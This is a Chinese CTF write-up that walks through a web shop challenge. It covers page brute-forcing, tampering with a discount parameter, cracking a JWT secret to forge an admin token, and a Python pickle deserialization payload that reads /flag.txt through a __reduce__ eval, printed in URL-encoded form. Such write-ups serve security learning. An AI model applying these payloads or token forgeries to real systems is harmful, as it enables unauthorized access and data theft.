看到提示说一定要找到lv6
这要写脚本来爆破了,用bp是爆破不出来的
发现LV等级都是有参数挂着的
写个脚本看一下
import requests for i in range(1,1000): payload="http://node4.anna.nssctf.cn:28150/shop?page=%d"%(i) res=requests.get(payload) if "lv6.png" in res.content.decode('utf-8'): print(i) break
发现是在181页
购买需要登录,先随便注册一个账号,
发现根本买不起,
抓个包看看有没有逻辑漏洞
把折扣改的极其大,发现跳转到这个页面,要admin访问
发现这里有个点是jwt,很容易联想到jwt加解密
用一个在线解码发现了
改成admin尝试登录
跳转到这个路径上了,并且发现是500,服务错误,应该是jwt的密钥不对,导致正常的回显页面没出来
使用了JWT身份验证,这里用户名为123,密码为123,用解密工具:c-jwt-cracker试着爆破一下
两种工具
1、c-jwt-cracker - ( https://github.com/brendan-rius/c-jwt-cracker)
C-jwt-cracker 是暴力破解 JWT 的私钥的工具。此外,它使用了 JWT 的实现,c-jwt-cracker 使用的 Base64库被证明是错误的,并且提供了无效的结果。
2、jwt-cracker - https://github.com/lmammino/jwt-cracker
该工具仅限于单一的签名算法(HS256) ,如果提供了不同的签名算法,则无法进行操作。
在这里使用 jwt-cracker 安装命令:
npm install --global jwt-cracker
安装好之后,运行命令:
jwt-cracker -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InR0In0.aT0YBJFCjWrVH5uwibrji_0NLf_1SHX3sfnBz14jmKE
在kali里边
apt-get install git git clone https://github.com/brendan-rius/c-jwt-cracker下载到本地后需要使用,make命令,就会生成jwtcrack
如果make报错
执行
sudo apt-get install libssl-dev
在make就可以了
爆破出来密钥是1Kun
改下jwt发现成功登录
JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
发现点击成为大会员一点用都没有
查看个人中心,发现hint是编码
网站都不用找了,直接gpt......
但是lv6页面我也是没找到什么东西,在/b1g_m4mber页面发现了源码压缩包,下载下来开始审计
接下来就是开始审计代码
看了看main.py没发现什么
看了下Admin.py,和这题的标签有点吻合,是python的反序列化
Admin.py
import tornado.web from sshop.base import BaseHandler import pickle import urllib class AdminHandler(BaseHandler): @tornado.web.authenticated def get(self, *args, **kwargs): if self.current_user == "admin": return self.render('form.html', res='This is Black Technology!', member=0) else: return self.render('no_ass.html') @tornado.web.authenticated def post(self, *args, **kwargs): try: become = self.get_argument('become') p = pickle.loads(urllib.unquote(become)) return self.render('form.html', res=p, member=1) except: return self.render('form.html', res='This is Black Technology!', member=0)
关键句是 p = pickle.loads(urllib.unquote(become))
这里用的是 pickle.loads函数
又看到是python2解释器
python2和python3的print是不一样的,python2中print是语句,但是在python3中print是函数
python2中的print "" 输出加不加括号都可以
而 python3中的print()必须要加括号
(1)pickle.dump(obj, file, [,protocol])
函数的功能:将obj对象序列化存入已经打开的file中。
参数讲解:
obj:想要序列化的obj对象。file:文件名称。
protocol:序列化使用的协议。如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
(2)pickle.load(file)
函数的功能:将file中的对象序列化读出。 参数讲解:
file:文件名称。
(3)pickle.dumps(obj[, protocol])
函数的功能:将obj对象序列化为string形式,而不是存入文件中。
参数讲解:
obj:想要序列化的obj对象。
protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
(4)pickle.loads(string)
函数的功能:从string中读出序列化前的obj对象。
参数讲解:
string:文件名称。
而在form.html中, <div class="ui segment">{{ res }}</div>这句话说明传入是可以回显的
那我们的目的明显是读取flag文件,然后利用res输出内容。
dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力:dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中,随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件,并将该类序列化之后进行URL编码
# -*- coding: utf-8 -*-
import pickle
import urllibclass payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))a = pickle.dumps(payload())
a = urllib.quote(a)
print(a)
c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.